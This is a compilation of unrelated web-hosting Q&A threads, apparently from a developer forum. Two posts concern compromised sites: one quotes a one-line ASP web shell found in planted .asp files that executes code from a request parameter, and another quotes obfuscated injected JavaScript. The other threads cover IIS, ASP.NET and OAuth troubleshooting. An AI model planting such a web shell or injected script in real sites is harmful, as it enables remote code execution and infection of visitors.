One of my clients noticed a message in google search results that said their website may have been hacked. After some digging, I found html files on the server that contained seo garbage and javascript references. I removed those files, change cms passwords, updated some components like CKFinder, etc...
I then started looking into other sites on the server and found tons of .asp files with this line
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.
I've updated the OS, which was only a month or two out of date, and changed ftp access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a windows 2003 server running IIS 6.0.
There is multiple ways that they may have gotten access to your server.
Are you running a common CMS or custom?
It could be possible that they have found a vulnerability in one of your scripts.
for example if they found a SQL injection vulnerability they could retrive database information.
if they where to find a RCE bug (remote code execution) they maybe have been able to execute system commands leading to the creating of those arbitrary files.
Other than that, there are a few vulnerabilities in windows server that have been patched this week, check out this link :
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html
Related
Ok,
First of all, I want to make the disclaimer that aside from some HTML I have done very little programming in my lifetime. However, as necessity so often dictates, I am in dire need of some assistance with that very thing at this moment.
Our agency has a web site that is hosted by another entity, and that entity is forcing our hand in moving the content of that site onto one of our own servers. All content has been moved to the new server, and all database tables from the old database have been moved onto our internal SQL server. The site primarily consists of asp files, but there is one page that is aspx. The problem arises when taking the "old" database tables offline and testing the aspx page. Even though all instances of the IP address to the old SQL server have been changed to reflect the IP of the new SQL server, the aspx page insists on requiring the connection to the old database (the error indicates the tables are offline, thus pointing to the old SQL server). Everything else works as it should, and the "Web Application" has been designated as such in IIS.
I know I am missing something somewhere... but I just can't put my finger on it. Any ideas would be greatly appreciated. I'm starting to wonder if the reference to the old IP address is compiled in a file somewhere that I just can't find.
Thanks
Ok guys, I found my solution. For programmers, this solution probably would have been a no-brainer, but for others maybe not so much.
I have to give a pat on the back to "Creator" for pointing me in the direction of the project file. I wasn't sure that it was still available, but thankfully the programmer who designed this application somewhere a little over ten years ago was nice enough to leave it in the web directory with everything else.
What I wound up doing was as follows:
Opened the project file in Visual Studio 2010 and converted the project from 2003 to 2010.
Added the connection strings into the web.config to the new SQL server.
Right clicked on each item and excluded all of the old pieces to the application (in Solution Explorer) that were no longer needed.
Right clicked on the project and navigated to Package/Publish Settings > Package/Publish SQL and chose to "Import from Web.config".
Saved the project, then right clicked and "Converted to Web Application".
Right clicked and performed a "Build". I'm guessing this re-wrote the dll file.
Copied the directory and needed files back over to the web server and converted the directory in IIS to a Web Application.
Sat back and marveled at my success.
Thank you guys for pointing me the right direction!
I have a developer that came to me with and issue. He is remotely managing one of his sites on one of our development servers and all of a sudden he lost all of the icons in IIS for this specific site..
All other sites display his icons correctly and when I have him test on another computer everything displays correctly.. So what could have gone wrong on his machine? It was working but is now not working.. Any help here would be greatly appreciated.. Never seen this before and cant seem to figure out what caused it to just go away.. There should be so many more options for him.. Plus if you can see he lost the ability to see the folders on this site also.. And it is every site on this server.. But like I said it is just on his computer, he goes to a different computer he has access to everything..
Guess I cant post a picture.. But if you need to see it I can send it to you if you need to see what I am talking about..
Come to find out he was ignoring the prompt that he was getting saying that there were new versions of the tools to download on his machine that are on the server.. He just hit Cancel instead of selecting them and hitting ok to install the DLL's and enabling them.
My question here is pretty simple: how to properly (and 100%) configure both Live Connect and project in Visual Studio 2013 in order for the local application run and authenticate an user properly against Microsoft account.
My question may be simple, but the answer is most likely not as simple. I've been reading countless articles and possible tutorials about this, but they are all fragmented and divided into small parts that do not really conciliate each other.
So below is the situation better described, with the steps I have followed.
[Steps Followed]
1) I have created a simple MVC application using Visual Studio 2013.
2) I have configured the project (using its properties) to use IIS Express with current Project Url : https://localhost:44302/
The project runs quite well, and external authentication with Facebook, Google and Twitter run very well too. Now for the tricky part:
3) I have created account with Microsoft and successfully created application in the Live Connect Developer Center.
4) Since configuring the field Redirect URLs to a simple http://localhost:<port> will not work (well...just because they didn't want it to, I suppose), I have additionally done the following..
5) Mapped in hosts file the following domain to localhost: # 127.0.0.1 mytestdomain.localtest.me
6) Reconfigured in Live Connect the Redirect URLs field to use the newly mapped domain: http://mytestdomain.localtest.me (although I have tried this with or without the port as well).
[End result]
With this configuration, the site runs properly locally. However, when I try to sign in with Microsoft account credentials (so, when I click the "Microsoft" button), I have redirected and received the following message:
"We're unable to complete your request
Microsoft account is experiencing technical problems. Please try again later."
I honestly do not understand why wouldn't this work, when a couple of articles suggested that doing these specific steps would make it work.
What can I be missing, why would this happen at all?
If someone can write here what am I missing and we could all join effort and create in this topic a full fledged, 100% working configuration for local application testing with Microsoft authentication, I believe it would help everyone. If such topic already exist and you can point me to it (because clearly I have missed it) it would also be great.
Thank you in advance,
Mad
Actually I just found out a proper and direct answer to my question. I totally missed it somehow during the last few days of research.
Microsoft's blog has all you need to make it work, and now mine does too. No big explanations and discussions, just basic and direct step by step article.
For those who could not find it and stumbled upon my topic here in StackOverflow, here is the link. Follow it word by word, and it will work.
Answer : Configuring your ASP.NET application for Microsoft OAuth account
yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
deactivate plugins that are not high ranked or from reputed source.
Use secure protocols.check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :
Change your passwords.
Restore the most recent non compromised backup.
I'm wanting to scan files a user uploads to our websites on the server-side. I'd prefer it to be something we can run on-demand that doesn't have to be running all the time on the server. What solutions are available for Windows Server 2008 R2? Which products specifically would you recommend?
If I were in your situation, I would script up a solution to call ClaimAV on the file, whenever you receive the file. For Windows, if you are running IIS, (or any web framework) there is probably some sort of callback on file reception you can plug this into.
Almost all the antivirus programs provide you a command-line version (or starting parameters) to scan just one file, or a directory.
There are several scanners on demand, there is a list named "Probably the Best Free Security List in the World" which lists a few, sorry I cannot provide the link because StackOverflow limits the amount of hyperlinks new users can post.
Although not listed in that list, one of the best I've used is the F-Prot Antivirus and it seems it runs well in Windows Server 2008
https://forum.f-prot.com/index.php?topic=1691.0
Cheers
For your case the best solution would be using http://www.virustotal.com/